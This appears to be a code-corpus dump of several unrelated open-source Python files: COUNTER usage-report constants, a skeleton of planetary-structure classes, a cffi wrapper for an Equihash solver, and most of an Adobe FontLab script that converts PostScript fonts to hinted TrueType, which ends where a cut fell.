DB_METRIC_MAP = {
"search_reg": METRICS["DB1"][0],
"search_fed": METRICS["DB1"][1],
"result_click": METRICS["DB1"][2],
"record_view": METRICS["DB1"][3],
"turnaway": METRICS["DB2"][0],
"no_license": METRICS["DB2"][1]
}
CODES = {
u"Database": u"DB",
u"Journal": u"JR",
u"Book": u"BR",
u"Title": u"TR",
u"Platform": u"PR",
u"Multimedia": u"MR",
u"Consortium": u"CR",
}
# from http://www.niso.org/workrooms/sushi/registry/
# Not all of these are actually supported by pycounter
REPORT_DESCRIPTIONS = {
u'BR1': u'Number of Successful Title Requests by Month and Title',
u'BR2': u'Number of Successful Section Requests by Month and Title',
u'BR3': u'Access Denied to Content Items by Month, Title, and Category',
u'BR4': u'Access Denied to Content Items by Month, Platform, and Category',
u'BR5': u'Total Searches by Month and Title',
u'CR1': u'Number of Successful Full-text Journal Article or Book Chapter '
u'Requests by Month',
u'CR2': u'Total Searches by Month and Database',
u'CR3': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'DB1': u'Total Searches, Result Clicks and Record Views by Month and '
u'Database',
u'DB2': u'Access Denied by Month, Database and Category',
u'JR1': u'Number of Successful Full-Text Article Requests by Month and '
u'Journal',
u'JR1GOA': u'Number of Successful Gold Open Access Full-Text Article '
u'Requests by Month and Journal',
u'JR1a': u'Number of Successful Full-Text Article Requests from an '
u'Archive by Month and Journal',
u'JR2': u'Access Denied to Full Text Articles by Month, Journal, and '
u'Category',
u'JR3': u'Number of Successful Item Requests and Turnaways by Month, '
u'Journal, and Page-Type',
u'JR3mobile': u'Number of Successful Item Requests by Month, Journal, '
u'and Page-Type for usage on a mobile device',
u'JR4': u'Total Searches Run by Month and Collection',
u'JR5': u'Number of Successful Full-Text Article Requests by '
u'Year-of-Publication (YOP) and Journal',
u'MR1': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'MR2': u'Number of Successful Multimedia Full Content Unit Requests by '
u'Month, Collection, and Item Type',
u'PR1': u'Total Searches, Result Clicks, and Record Views by Month and '
u'Platform',
u'TR1': u'Number of Successful Requests for Journal Full-Text Articles '
u'and Book Sections by Month and Title',
u'TR1mobile': u'Number of Successful Requests for Journal Full-Text '
u'Articles and Book Sections by Month and Title '
u'(formatted for normal browsers/delivered to mobile '
u'devices AND formatted for mobile devices/delivered '
u'to mobile devices)',
u'TR2': u'Access Denied to Full-Text Items by Month, Title, and Category',
u'TR3': u'Number of Successful Item Requests by Month, Title, and '
u'Page-Type',
u'TR3mobile': u'Number of Successful Item Requests by Month, Title, '
u'and Page-Type (formatted for normal browsers/delivered '
u'to mobile devices and for mobile devices/delivered to '
u'mobile devices)',
}
HEADER_FIELDS = {
"JR1": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR2": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR3": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"BR1": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR2": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"BR3": (
u'',
u'Publisher',
u'Platform',
u'Book DOI',
u'Proprietary Identifier',
u'ISBN',
u'ISSN',
u'Reporting Period Total',
),
"DB1": (
u'Database',
u'Publisher',
u'Platform',
u'User Activity',
u'Reporting Period Total',
),
"DB2": (
u'Database',
u'Publisher',
u'Platform',
u'Access denied category',
u'Reporting Period Total',
),
}
TOTAL_TEXT = {
'JR1': u'Total for all journals',
'BR1': u'Total for all titles',
'BR2': u'Total for all titles',
'DB2': u'Total for all databases',
}
|
mit
| -3,423,670,937,387,437,600
| 32.754098
| 79
| 0.583293
| false
| 3.531732
| false
| false
| false
|
smwahl/PlLayer
|
outline.py
|
1
|
8657
|
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib
from copy import deepcopy
class planet(object):
''' Represents a snapshot of an evolving planet, with methods
for comparing different snapshots and relating thermal evolution to
time.'''
def __init__(self, params=None, pcopy=None):
''' Create planet snapshot, either with new parameters or with
another planet object.'''
self.layers = []
self.boundaries = []
self.mass = None
self.radius = None
# tracks whether structure (radii,T-profiles) have been calculated since modifications were made
self.structured = False
if not pcopy is None:
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.mass = deepcopy(pcopy.mass)
self.radius = deepcopy(pcopy.radius)
def setLayers(self,layers):
''' Define the layers to be included in the planet snapshot.
Note: information not copied'''
self.layers = layers
# add boundaries consistent with the layers
self.boundaries = []
for layer in layers:
lbounds = layer.boundaries
self.boundaries += [ lb for lb in lbounds if lb not in self.boundaries ]
def setBoundaries(self,boundaries):
''' Define the boundaries to be included in the planet snapshot.
Note: Information not copied'''
self.boundaries = boundaries
# add layers consistent with the boundaries
self.layers = []
for bound in boundaries:
blayers = bound.layers
self.layers += [ bl for bl in blayers if bl not in self.layers ]
# Following functions will probably be feature of the more specific model,
# might want to add placeholder functions, however.
# def stepT(dT,boundary):
# ''' Simulated timestep in which a boundaries lower temperature is
# changed by dT'''
# def QtoTime(self,dQ):
# ''' Placeholder, should be defined by specific model '''
# def diff(comp_snapshot):
# ''' Compare energy and entropy budgets of various layers. Relates the
# difference to a heat flow for one snapshot to evolve into the previous one.'''
# def structure(T,boundary):
# ''' Integrate Strucuture, specifing the temperature at a boundary '''
def budgets(self):
''' Report integrated energy and entropy budgets for layers in the planet'''
pass
class xlznCorePlanet(planet):
''' Represents the particular situation of a crystallizing metallic core
with a simple model for mantle evolution'''
def __init__(self,planet_file=None,pcopy=None):
''' Initialize xlznCorePlanet object. Will eventually want to take input
file names as arguments.'''
if not pcopy is None:
self.mantle = deepcopy(pcopy.mantle)
self.core = deepcopy(pcopy.core)
self.layers = deepcopy(pcopy.layers)
self.boundaries = deepcopy(pcopy.boundaries)
self.surface = deepcopy(pcopy.surface)
self.cmb = deepcopy(pcopy.cmb)
self.icb = deepcopy(pcopy.icb)
self.center = deepcopy(pcopy.center)
self.mass = pcopy.mass
self.radius = pcopy.radius
self.mantle_density = pcopy.mantle_density
self.core_mass = pcopy.core_mass
self.structured = pcopy.structured
return None
# Define materials from text files
rock = Material('simpleSilicateMantle.txt')
liqFeS = Material('binaryFeS.txt', mtype='liquid')
solFe = Material('simpleSolidIron.txt')
# Define melting/solidification relationships under consideration
liqFeS.interp_liquidus('FeS', solFe)
self.mantle = layer('mantle',material=rock)
self.core = xlznLayer('core', material=liqFeS, layernames=['outer_core','inner_core'],
boundnames=['icb'])
# set list of layers (self.core.layers initially holds a single liquid layer)
self.layers = [self.mantle] + self.core.layers
# set list of boundaries
self.boundaries = GenerateBoundaries(self.layers,['surface','cmb','center'])
self.surface = self.boundaries[0]
self.cmb = self.boundaries[1]
self.center = self.boundaries[-1]
self.icb = None # indicates icb has yet to form
# read in parameters from file and decide whether this is new planet or a continuation
# at a different condition
try:
params = parseParamFile(open(planet_file,'r'))
except IOError:
raise Exception('File not found: {}'.format(planet_file))
try:
self.mass = params.Mplanet
self.radius = params.Rplanet
core_radius = params.Rcore
self.cmb.r = core_radius
self.surface.r = self.radius
self.mantle_density = None
self.core_mass = None
self.center.P = params.P0
self.cmb.T = params.Tcmb
smode = 'initial'
except AttributeError:
try:
self.mass = params.Mplanet
self.mantle_density = params.rhomantle
self.core_mass = params.Mcore
self.core.M = self.core_mass
self.center.P = params.P0
self.cmb.T = params.Tcmb
self.radius = None
smode = 'cont'
except AttributeError:
raise Exception('Invalid input file.')
# Integrate structure (making the entire structure consistent with starting values)
success = self.structure(mode=smode)
# should check to make sure the integration succeeded
if success:
self.radius = self.surface.r
#self.mantle_density =
self.core_mass = self.core.M
self.structured = True
Mplanet = self.mass
Mcore = self.core_mass
rhomantle = self.mantle_density
P0 = self.center.P
params = [Mplanet, Mcore, rhomantle, P0]
# write new parameter file to run a planet with consistent mass and mantle density
writeParamFile(open('./xlzncoreplanet_cont.txt', 'w'), params)
return None
else:
raise Exception('Structure integration failed.')
class layer(object):
''' A layer is a portion of a planet with an adiabatic temperature profile,
composed of a single material '''
def __init__(self,name='',mass=None,material=None,comp=None):
self.name = name
self.boundaries = None
self.mass = mass
self.material = material
self.comp = comp
def specEnergy(self):
pass
class liquidLayer(layer):
''' A liquid layer has a specific entropy which can be related to viscous and/or
ohmic dissipation.'''
def specEntropy(self):
pass
class xlznLayer(object):
''' Defines a layer of liquid material that is free to crystallize upon
cooling. Contains a list of solids with a corresponding liquidus. Three
outcomes are possible when the adiabat intersects a liquidus:
1) solid more dense and adiabat remains below liquidus to the bottom of the
layer, forming a settled region at the bottom.
2) identical case with a less dense solid settling to the top
3) 'snow' regime, where sinking/floating crystals would remelt before settling
For 1) and 2) a separate solid layer is formed. For 3) the liquid adiabat
is instead constrained to follow the liquidus'''
def __init__(self, name='', material=None, layernames=None, boundnames=None):
self.name = name
self.liquid = material
self.solids = []
self.comp = None # Mass ratio of different components
self.mass = None
self.liquidi = [] # a liquidus corresponding to each solid phase
self.adiabat = None # a modified adiabat, following the liquidus in a 'snow' region.
self.layers = [] # sub-layers; initially a single liquid layer
class boundary(object):
def __init__(self):
self.T = None # upper and lower temperature
self.d = None
self.layers = []
def calcEnergy(self):
pass
def calcEntropy(self):
pass
class Material(object):
'''Class for keeping track of various physical properties of a material and how
these vary as a function of P, T and composition.'''
def __init__(self, param_file=None, mtype=None):
self.liquidus = None
self.components = None
self.mtype = mtype
self.td_params = None # holds functions for returning thermodynamic parameters
if param_file:
self.set_td_params(param_file)
def interp_liquidus(self, data_file, solid):
pass
def set_td_params(self, param_file):
pass
def shellIntegral(funcs, r0=0., r1=1., tols=[], limits=[]):
''' Integrate an arbitrary number of functions over a shell from r0 to r1. '''
pass
|
mit
| -6,883,647,413,842,892,000
| 32.296154
| 104
| 0.621116
| false
| 4.178089
| false
| false
| false
|
slush0/epycyzm
|
morpavsolver/__init__.py
|
1
|
3468
|
# https://github.com/morpav/zceq_solver--bin
from cffi import FFI
import os.path
import inspect
ffi = None
library = None
library_header = """
typedef struct {
char data[1344];
} Solution;
typedef struct {
unsigned int data[512];
} ExpandedSolution;
typedef struct HeaderAndNonce {
char data[140];
} HeaderAndNonce;
typedef struct ZcEquihashSolverT ZcEquihashSolver;
ZcEquihashSolver* CreateSolver(void);
void DestroySolver(ZcEquihashSolver* solver);
int FindSolutions(ZcEquihashSolver* solver, HeaderAndNonce* inputs,
Solution solutions[], int max_solutions);
int ValidateSolution(ZcEquihashSolver* solver, HeaderAndNonce* inputs, Solution* solutions);
void RunBenchmark(long long nonce_start, int iterations);
bool ExpandedToMinimal(Solution* minimal, ExpandedSolution* expanded);
bool MinimalToExpanded(ExpandedSolution* expanded, Solution* minimal);
"""
def load_library(path=None):
global library, ffi
assert library is None
ffi = FFI()
ffi.cdef(library_header)
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'morpavsolver.so')
library = ffi.dlopen(path)
assert library is not None
class Solver:
def __init__(self):
self.solver_ = self.header_ = self.solutions_ = self.solution_to_check_ = None
self._ensure_library()
assert library and ffi
self.solver_ = library.CreateSolver()
self.header_ = ffi.new("HeaderAndNonce*")
self.solutions_ = ffi.new("Solution[16]")
self.solution_to_check_ = ffi.new("Solution*")
self.expanded_tmp_ = ffi.new("ExpandedSolution*")
def __del__(self):
# Free the underlying resources on destruction
library.DestroySolver(self.solver_)
self.solver_ = None
# cffi's cdata are collected automatically
self.header_ = self.solutions_ = self.solution_to_check_ = None
def _ensure_library(self):
# Try to load the library from its standard location
if library is None:
load_library()
def run_benchmark(self, iterations=10, nonce_start=0):
library.RunBenchmark(nonce_start, iterations)
def find_solutions(self, block_header):
assert len(block_header) == 140
self.header_.data = block_header
return library.FindSolutions(self.solver_, self.header_, self.solutions_, 16)
def get_solution(self, num):
assert(num >= 0 and num < 16)
return bytes(ffi.buffer(self.solutions_[num].data))
def validate_solution(self, block_header, solution):
assert len(block_header) == 140
assert len(solution) == 1344
self.solution_to_check_.data = solution
return library.ValidateSolution(self.solver_, self.header_, self.solution_to_check_)
def list_to_minimal(self, expanded):
if isinstance(expanded, (list, tuple)):
assert len(expanded) == 512
minimal = ffi.new("Solution*")
tmp = self.expanded_tmp_
for i, idx in enumerate(expanded):
tmp.data[i] = idx
expanded = tmp
res = library.ExpandedToMinimal(minimal, expanded)
assert res
return minimal
def minimal_to_list(self, minimal):
tmp = self.expanded_tmp_
res = library.MinimalToExpanded(tmp, minimal)
assert res
result = [tmp.data[i] for i in range(512)]
return result
__all__ = ['Solver', 'load_library']
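# Hypothetical usage sketch (assumes morpavsolver.so can be loaded; the
# all-zero header is a placeholder for a real 140-byte block header plus
# nonce):
if __name__ == '__main__':
    solver = Solver()
    header = b'\x00' * 140
    n = solver.find_solutions(header)
    print('%d solution(s) found' % n)
    for i in range(n):
        sol = solver.get_solution(i)  # minimal 1344-byte encoding
        print('solution %d valid: %d' % (i, solver.validate_solution(header, sol)))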
|
mit
| 957,639,449,207,624,700
| 28.896552
| 93
| 0.654268
| false
| 3.729032
| false
| false
| false
|
adobe-type-tools/fontlab-scripts
|
TrueType/convertToTTF.py
|
1
|
28980
|
#FLM: Convert PFA/UFO/TXT to TTF/VFB
# coding: utf-8
__copyright__ = __license__ = """
Copyright (c) 2015-2016 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Convert PFA/UFO/TXT to TTF/VFB
This FontLab script will convert one or more hinted PFA/UFO or TXT files
into TTF files, for use as input for makeOTF.
The script will first ask for a directory, which usually should be the
family's top-most folder. It will then crawl through that folder and
process all input files it finds. In addition to the directory, the script
will also ask for an encoding file. This encoding file is a FontLab '.enc'
file which the script will use for ordering the glyphs.
Note:
This script imports the `Input TrueType Hints` script, therefore needs to be
run from the same folder.
==================================================
Versions:
v1.7 - Jun 17 2016 - Skip 'prep' table processing if the font doesn't have it.
v1.6 - Apr 25 2016 - Replace ttx commands by fontTools operations.
v1.5 - Jul 17 2015 - Turn off the addition of NULL and CR glyphs.
v1.4 - Apr 17 2015 - Support changes made to inputTTHints module.
v1.3 - Apr 02 2015 - Now also works properly on FL Windows.
v1.2 - Mar 26 2015 - Move code reading external `tthints` file to an adjacent
module.
v1.1 - Mar 23 2015 - Allow instructions in x-direction.
v1.0 - Mar 04 2015 - Initial public release (Robothon 2015).
"""
import os
import re
import sys
import time
from FL import *
import fl_cmd
try:
import dvInput_module
dvModuleFound = True
except ImportError:
dvModuleFound = False
fl.output = ''
errorHappened = False
# ----------------------------------------------------------------------------------------
# Find and import inputTTHints module:
def findFile(fileName, path):
'Find file of given fileName, starting at path.'
for root, dirs, files in os.walk(path):
if fileName in files:
return os.path.join(root)
else:
return None
moduleName = 'inputTTHints.py'
userFolder = os.path.expanduser('~')
customModulePathMAC = os.sep.join((
userFolder, 'Library', 'Application Support',
'FontLab', 'Studio 5', 'Macros'))
customModulePathPC = os.sep.join((
userFolder, 'Documents', 'FontLab', 'Studio5', 'Macros'))
possibleModulePaths = [fl.userpath, customModulePathMAC, customModulePathPC]
print '\nLooking for %s ... ' % (moduleName)
for path in possibleModulePaths:
modPath = findFile(moduleName, path)
if modPath:
print 'found at %s' % modPath
break
if not modPath:
# Module was not found. World ends.
errorHappened = True
print 'Not found in the following folders:\n%s\n\
Please make sure the possibleModulePaths list in this script \
points to a folder containing %s' % ('\n'.join(possibleModulePaths), moduleName)
else:
# Module was found, import it.
if modPath not in sys.path:
sys.path.append(modPath)
import inputTTHints
# ----------------------------------------------------------------------------------------
MAC = False
PC = False
if sys.platform in ('mac', 'darwin'):
MAC = True
elif os.name == 'nt':
PC = True
# Add the FDK path to the env variable (on Mac only) so
# that command line tools can be called from FontLab
if MAC:
fdkPathMac = os.sep.join((
userFolder, 'bin', 'FDK', 'tools', 'osx'))
envPath = os.environ["PATH"]
newPathString = envPath + ":" + fdkPathMac
if fdkPathMac not in envPath:
os.environ["PATH"] = newPathString
if PC:
from subprocess import Popen, PIPE
# ----------------------------------------------------------------------------------------
# Import the FDK-embedded fontTools
if MAC:
osFolderName = "osx"
if PC:
osFolderName = "win"
fontToolsPath = os.sep.join((
userFolder, 'bin', 'FDK', 'Tools',
osFolderName, 'Python', 'AFDKOPython27', 'lib',
'python2.7', 'site-packages', 'FontTools'))
if fontToolsPath not in sys.path:
sys.path.append(fontToolsPath)
try:
from fontTools import ttLib
except ImportError:
print "\nERROR: FontTools Python module is not installed.\nGet the latest version at https://github.com/behdad/fonttools"
errorHappened = True
# ----------------------------------------------------------------------------------------
# constants:
kPPMsFileName = "ppms"
kTTHintsFileName = "tthints"
kGOADBfileName = "GlyphOrderAndAliasDB"
kTempEncFileName = ".tempEncoding"
kFontTXT = "font.txt"
kFontUFO = "font.ufo"
kFontTTF = "font.ttf"
flPrefs = Options()
flPrefs.Load()
def readFile(filePath):
file = open(filePath, 'r')
fileContent = file.read().splitlines()
file.close()
return fileContent
def writeFile(contentList, filePath):
outfile = open(filePath, 'w')
outfile.writelines(contentList)
outfile.close()
def getFontPaths(path):
fontsList = []
for root, folders, files in os.walk(path):
fileAndFolderList = folders[:]
fileAndFolderList.extend(files)
pfaRE = re.compile(r'(^.+?\.pfa)$', re.IGNORECASE)
ufoRE = re.compile(r'(^.+?\.ufo)$', re.IGNORECASE)
txtRE = re.compile(r'^font.txt$', re.IGNORECASE)
pfaFiles = [
match.group(1) for item in fileAndFolderList
for match in [pfaRE.match(item)] if match]
ufoFiles = [
match.group(1) for item in fileAndFolderList
for match in [ufoRE.match(item)] if match]
txtFiles = [
match.group(0) for item in fileAndFolderList
for match in [txtRE.match(item)] if match]
# Prioritizing the list of source files, so that only one of them is
# found and converted; in case there are multiple possible files in
# a single folder. Order of priority is PFA - UFO - TXT.
allFontsFound = pfaFiles + ufoFiles + txtFiles
if len(allFontsFound):
item = allFontsFound[0]
fontsList.append(os.path.join(root, item))
else:
continue
return fontsList
def getGOADB2ndColumn(goadbList):
'Get the second column of the original GOADB file and return it as a list.'
resultList = []
lineNum = 1
skippedLines = 0
re_match1stCol = re.compile(r"(\S+)\t(\S+)(\t\S+)?")
for line in goadbList:
# allow for comments:
line = line.split('#')[0]
# Skip over blank lines
stripline = line.strip()
if not stripline:
skippedLines += 1
continue
result = re_match1stCol.match(line)
if result: # the result can be None
resultList.append(result.group(2) + '\n')
else: # nothing matched
print "Problem matching line %d (current GOADB)" % lineNum
lineNum += 1
if (len(goadbList) != (len(resultList) + skippedLines)):
print "ERROR: There was a problem processing the current GOADB file"
return None
else:
return resultList
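# A GOADB line is expected to look like this (tab-separated, third
# column optional; values illustrative):
#
# a	a	uni0061
# adieresis	adieresis	uni00E4
#
# Only the production names (second column) are kept; they later become
# the temporary encoding file used to reorder the font's glyphs.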
def makeTempEncFileFromGOADB(goadbPath):
goadbFileContent = readFile(goadbPath)
goadb2ndColumnList = getGOADB2ndColumn(goadbFileContent)
if not goadb2ndColumnList:
return None
encPath = os.path.join(os.path.dirname(goadbPath), kTempEncFileName)
writeFile(goadb2ndColumnList, encPath)
return encPath
def readPPMsFile(filePath):
lines = readFile(filePath)
hPPMsList = []
vPPMsList = []
for i in range(len(lines)):
line = lines[i]
# Skip over blank lines
stripline = line.strip()
if not stripline:
continue
# Get rid of all comments
if line.find('#') >= 0:
continue
else:
if "X:" in line:
vPPMsList.append(line)
else:
hPPMsList.append(line)
return hPPMsList, vPPMsList
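# Expected layout of a `ppms` file line, matching the tab-separated
# split done in replaceStemsAndPPMs() below (names and values are
# illustrative); stems whose name contains "X:" are read as vertical
# stems, all other lines as horizontal stems:
#
# X: StdVW	84	11	22	33	44	55
# StdHW	76	10	21	32	43	54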
def replaceStemsAndPPMs(hPPMsList, vPPMsList):
if len(hPPMsList) != len(fl.font.ttinfo.hstem_data):
print "\tERROR: The amount of H stems does not match"
return
if len(vPPMsList) != len(fl.font.ttinfo.vstem_data):
print "\tERROR: The amount of V stems does not match"
return
for i in range(len(fl.font.ttinfo.hstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = hPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.hstem_data[i] = stem
for i in range(len(fl.font.ttinfo.vstem_data)):
name, width, ppm2, ppm3, ppm4, ppm5, ppm6 = vPPMsList[i].split('\t')
stem = TTStem()
stem.name = name
stem.width = int(width)
stem.ppm2 = int(ppm2)
stem.ppm3 = int(ppm3)
stem.ppm4 = int(ppm4)
stem.ppm5 = int(ppm5)
stem.ppm6 = int(ppm6)
fl.font.ttinfo.vstem_data[i] = stem
def processZonesArray(inArray):
outArray = []
for x in range(len(inArray)/2):
if inArray[x * 2] < 0:
outArray.append(inArray[x * 2])
outArray.append(inArray[x * 2 + 1])
outArray.sort()
return outArray
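# Illustrative: keeps only zone pairs whose first (bottom) value is
# negative, i.e. zones below the baseline, and returns them sorted:
#   processZonesArray([-250, -240, 500, 510]) -> [-250, -240]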
def removeBottomZonesAboveBaseline():
baselineZonesWereRemoved = False
# this is a single master font, so only the
# first array will have non-zero values:
newOtherBluesArray = processZonesArray(fl.font.other_blues[0])
if (fl.font.other_blues_num != len(newOtherBluesArray)):
# trim the number of zones
fl.font.other_blues_num = len(newOtherBluesArray)
for x in range(len(newOtherBluesArray)):
fl.font.other_blues[0][x] = newOtherBluesArray[x]
baselineZonesWereRemoved = True
newFamilyOtherBluesArray = processZonesArray(fl.font.family_other_blues[0])
if (fl.font.family_other_blues_num != len(newFamilyOtherBluesArray)):
# trim the number of zones
fl.font.family_other_blues_num = len(newFamilyOtherBluesArray)
for x in range(len(newFamilyOtherBluesArray)):
fl.font.family_other_blues[0][x] = newFamilyOtherBluesArray[x]
baselineZonesWereRemoved = True
return baselineZonesWereRemoved
def replaceFontZonesByFamilyZones():
"""
The font's zones are replaced by the family zones to make sure that all
the styles have the same vertical height at all ppems. If the font doesn't
have family zones (e.g. Regular style), don't do anything.
"""
fontZonesWereReplaced = False
# TOP zones
if len(fl.font.family_blues[0]):
if fl.font.family_blues_num == 14 and fl.font.blue_values_num < fl.font.family_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's TOP zones cannot be replaced by the family TOP zones"
print
return fontZonesWereReplaced
elif fl.font.family_blues_num == 14 and fl.font.blue_values_num == fl.font.family_blues_num:
pass
else:
fl.font.blue_values_num = fl.font.family_blues_num
# This will create a traceback if there are 7 top zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_blues[0])):
fl.font.blue_values[0][x] = fl.font.family_blues[0][x]
print "WARNING: The font's TOP zones were replaced by the family TOP zones."
fontZonesWereReplaced = True
# BOTTOM zones
if len(fl.font.family_other_blues[0]):
if fl.font.family_other_blues_num == 10 and fl.font.other_blues_num < fl.font.family_other_blues_num:
print
print "### MAJOR ERROR ###: Due to a FontLab bug the font's BOTTOM zones cannot be replaced by the family BOTTOM zones"
print
return fontZonesWereReplaced
elif fl.font.family_other_blues_num == 10 and fl.font.other_blues_num == fl.font.family_other_blues_num:
pass
else:
fl.font.other_blues_num = fl.font.family_other_blues_num
# This will create a traceback if there are 5 bottom zones,
# therefore the IFs above.
# Replace the font's zones by the family zones
for x in range(len(fl.font.family_other_blues[0])):
fl.font.other_blues[0][x] = fl.font.family_other_blues[0][x]
print "WARNING: The font's BOTTOM zones were replaced by the family BOTTOM zones."
fontZonesWereReplaced = True
return fontZonesWereReplaced
def convertT1toTT():
'''
Converts an open FL font object from PS to TT outlines, using on-board
FontLab commands. The outlines are post-processed to reset starting points
to their original position.
'''
for g in fl.font.glyphs:
# Keeping track of original start point coordinates:
startPointCoords = [
(point.x, point.y) for point in g.nodes if point.type == 17]
# fl.TransformGlyph(g, 5, "0001") # Remove Horizontal Hints
# fl.TransformGlyph(g, 5, "0003") # Remove Horizontal & Vertical Hints
fl.TransformGlyph(g, 5, "0002") # Remove Vertical Hints
fl.TransformGlyph(g, 13, "") # Curves to TrueType
fl.TransformGlyph(g, 14, "0001") # Contour direction [TT]
# The start points might move when FL reverses the contour.
# This dictionary keeps track of the new coordinates.
newCoordDict = {
(node.x, node.y): index for index, node in enumerate(g.nodes)}
# Going through all start points backwards, and re-setting them
# to original position.
for pointCoords in startPointCoords[::-1]:
g.SetStartNode(newCoordDict[pointCoords])
fl.TransformGlyph(g, 7, "") # Convert PS hints to TT instructions.
def changeTTfontSettings():
# Clear `gasp` array:
if len(fl.font.ttinfo.gasp):
del fl.font.ttinfo.gasp[0]
# Create `gasp` element:
gaspElement = TTGasp(65535, 2)
# Range: 65535=0...
# Options: 0=None
# 1=Instructions
# 2=Smoothing
# 3=Instructions+Smoothing
# Add element to `gasp` array
fl.font.ttinfo.gasp[0] = gaspElement
# Clear `hdmx` array
for i in range(len(fl.font.ttinfo.hdmx)):
try:
del fl.font.ttinfo.hdmx[0]
except:
continue
# Uncheck "Create [vdmx] table", also
# uncheck "Automatically add .null, CR and space characters"
fl.font.ttinfo.head_flags = 0
def setType1openPrefs():
flPrefs.T1Decompose = 1 # checked - Decompose all composite glyphs
flPrefs.T1Unicode = 0 # unchecked - Generate Unicode indexes for all glyphs
flPrefs.OTGenerate = 0 # unchecked - Generate basic OpenType features for Type 1 fonts with Standard encoding
flPrefs.T1MatchEncoding = 0 # unchecked - Find matching encoding table if possible
def setTTgeneratePrefs():
flPrefs.TTENoReorder = 1 # unchecked - Automatically reorder glyphs
flPrefs.TTEFontNames = 1 # option - Do not export OpenType name records
flPrefs.TTESmartMacNames = 0 # unchecked - Use the OpenType names as menu names on Macintosh
flPrefs.TTEStoreTables = 0 # unchecked - Write stored custom TrueType/OpenType tables
flPrefs.TTEExportOT = 0 # unchecked - Export OpenType layout tables
flPrefs.DSIG_Use = 0 # unchecked - Generate digital signature (DSIG table)
flPrefs.TTEHint = 1 # checked - Export hinted TrueType fonts
flPrefs.TTEKeep = 1 # checked - Write stored TrueType native hinting
flPrefs.TTEVisual = 1 # checked - Export visual TrueType hints
flPrefs.TTEAutohint = 0 # unchecked - Autohint unhinted glyphs
flPrefs.TTEWriteBitmaps = 0 # unchecked - Export embedded bitmaps
flPrefs.CopyHDMXData = 0 # unchecked - Copy HDMX data from base to composite glyph
flPrefs.OTWriteMort = 0 # unchecked - Export "mort" table if possible
flPrefs.TTEVersionOS2 = 3 # option - OS/2 table version 3
flPrefs.TTEWriteKernTable = 0 # unchecked - Export old-style non-OpenType "kern" table
flPrefs.TTEWriteKernFeature = 0 # unchecked - Generate OpenType "kern" feature if it is undefined or outdated
flPrefs.TTECmap10 = 1 # option - Use following codepage to build cmap(1,0) table:
# [Current codepage in the Font Window]
flPrefs.TTEExportUnicode = 0 # checked - Ignore Unicode indexes in the font
# option - Use following codepage for first 256 glyphs:
# Do not reencode first 256 glyphs
# unchecked - Export only first 256 glyphs of the selected codepage
# unchecked - Put MS Char Set value into fsSelection field
def setTTautohintPrefs():
# The single link attachment precision is 7 in all cases
# flPrefs.TTHHintingOptions = 16135 # All options checked
# flPrefs.TTHHintingOptions = 7 # All options unchecked
flPrefs.TTHHintingOptions = 2055 # Cusps option checked
def postProccessTTF(fontFilePath):
'''
Post-process TTF font as generated by FontLab:
- change FontLab-generated glyph name 'nonmarkingspace' to 'nbspace'
- edit `prep` table to stop hints being active at 96 ppm and above.
'''
print "Post-processing font.ttf file..."
font = ttLib.TTFont(fontFilePath)
glyphOrder = font.getGlyphOrder()
postTable = font['post']
if 'prep' in font.keys():
prepTable = font['prep']
else:
prepTable = None
glyfTable = font['glyf']
hmtxTable = font['hmtx']
# Change name of 'nonbreakingspace' to 'nbspace' in GlyphOrder
# and glyf table and add it to post table
if "nonbreakingspace" in glyphOrder:
# updateGlyphOrder = True
glyphOrder[glyphOrder.index("nonbreakingspace")] = "nbspace"
font.setGlyphOrder(glyphOrder)
glyfTable.glyphs["nbspace"] = glyfTable.glyphs["nonbreakingspace"]
del glyfTable.glyphs["nonbreakingspace"]
hmtxTable.metrics["nbspace"] = hmtxTable.metrics["nonbreakingspace"]
del hmtxTable.metrics["nonbreakingspace"]
postTable.extraNames.append("nbspace")
# Delete NULL and CR
